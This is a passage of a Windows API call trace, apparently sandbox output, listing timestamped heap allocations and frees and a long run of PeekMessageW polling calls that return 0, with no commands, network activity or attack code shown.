RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc019a8 [0257.619] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019a8 | out: hHeap=0xbc0000) returned 1 [0257.619] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6f0 [0257.619] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc019a8 [0257.619] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019a8 | out: hHeap=0xbc0000) returned 1 [0257.619] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9c40 | out: hHeap=0xbc0000) returned 1 [0257.619] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6f0 | out: hHeap=0xbc0000) returned 1 [0257.619] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.619] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b58 | out: hHeap=0xbc0000) returned 1 [0257.619] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6f0 [0257.619] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9c40 [0257.619] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01b58 [0257.619] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9c40 | out: hHeap=0xbc0000) returned 1 [0257.619] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b58 | out: hHeap=0xbc0000) returned 1 [0257.619] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6f0 | out: hHeap=0xbc0000) returned 1 [0257.619] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.619] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b58 [0257.620] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.620] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.620] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.620] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.620] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.620] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.620] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.620] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.620] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.620] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.620] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.620] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.620] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.620] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.620] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.620] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.620] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.621] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.621] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.621] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc3d620 | out: hHeap=0xbc0000) returned 1 [0257.621] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.621] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.621] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.621] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.621] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.621] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.621] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.621] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.621] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.621] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.621] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.621] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.621] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.621] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.621] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.621] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.621] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.622] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.622] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.622] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.622] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.622] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.622] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.622] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.622] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.622] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.622] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.622] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc3d620 | out: hHeap=0xbc0000) returned 1 [0257.622] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.622] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.622] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.622] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.622] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.622] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.622] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.622] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.622] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.623] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.623] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.623] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.623] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.623] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.623] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.623] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.623] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.623] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.623] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.623] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.623] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.623] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.623] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.623] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.623] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.623] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.623] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.623] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc3d620 | out: hHeap=0xbc0000) returned 1 [0257.623] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.623] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc3d5e0 | out: hHeap=0xbc0000) returned 1 [0257.623] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.624] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.624] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.624] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.624] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.624] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.624] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.624] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.624] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.624] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.624] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.624] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.624] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.624] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.624] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.624] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.624] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.624] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.624] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.624] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.624] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.624] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.625] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.625] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.625] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.625] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.625] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.625] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.625] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.625] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.625] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.625] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.625] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.625] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.625] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.625] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.625] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.625] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.625] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.625] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.625] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.625] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.625] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.625] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.625] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.625] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.626] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.626] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.626] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.626] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.626] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.626] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.626] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.626] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.626] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.626] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.626] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.626] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.626] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.626] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.626] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.626] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.626] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.626] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.626] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 